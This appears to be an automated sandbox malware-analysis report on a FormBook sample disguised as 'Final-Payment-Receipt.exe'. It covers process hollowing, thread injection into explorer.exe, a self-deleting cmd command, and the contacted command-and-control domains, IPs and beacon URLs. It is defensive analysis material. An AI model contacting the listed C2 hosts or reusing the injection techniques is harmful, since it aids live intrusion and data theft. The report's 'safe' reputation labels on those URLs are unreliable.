          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01480EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01480EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01480EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0372F370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0372F370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0372F370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03743B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03743B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0371DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0371F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0371DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037C23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037C23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037C23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037453C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03744BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03744BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03744BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03742397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03721B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03721B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0375927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03755A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03755A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.230 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.236.49 80
          Source: C:\Windows\explorer.exeNetwork Connect: 27.123.27.33 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeMemory written: C:\Users\user\Desktop\Final-Payment-Receipt.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: E10000
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: explorer.exe, 00000002.00000000.242407386.0000000005EA0000.00000004.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000000.235309423.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeQueries volume information: C:\Users\user\Desktop\Final-Payment-Receipt.exe VolumeInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 320833 Sample: Final-Payment-Receipt.exe Startdate: 19/11/2020 Architecture: WINDOWS Score: 100 31 g.msn.com 2->31 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Yara detected AntiVM_3 2->43 45 5 other signatures 2->45 11 Final-Payment-Receipt.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\...\Final-Payment-Receipt.exe.log, ASCII 11->29 dropped 55 Tries to detect virtualization through RDTSC time measurements 11->55 57 Injects a PE file into a foreign processes 11->57 15 Final-Payment-Receipt.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.wacrox.com 162.0.236.49, 49730, 80 NAMECHEAP-NETUS Canada 18->33 35 trumpingitagain.com 27.123.27.33, 49731, 80 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 18->35 37 4 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Final-Payment-Receipt.exe34%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          Final-Payment-Receipt.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.Final-Payment-Receipt.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ980%Avira URL Cloudsafe
          http://www.wacrox.com/71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr0%Avira URL Cloudsafe
          http://www.trumpingitagain.com/71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.wacrox.com
          		162.0.236.49
          		truetrue
            		unknown
            themindofafunnygirl.com
            		192.0.78.230
            		truetrue
              		unknown
              trumpingitagain.com
              		27.123.27.33
              		truetrue
                		unknown
                g.msn.com
                		unknown
                		unknownfalse
                  		high
                  www.themindofafunnygirl.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.azarblock.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.trumpingitagain.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.wacrox.com/71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhrtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.trumpingitagain.com/71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhrtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhrtrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.comexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98wlanext.exe, 00000003.00000002.492344982.00000000041AF000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.tiro.comexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                    		high
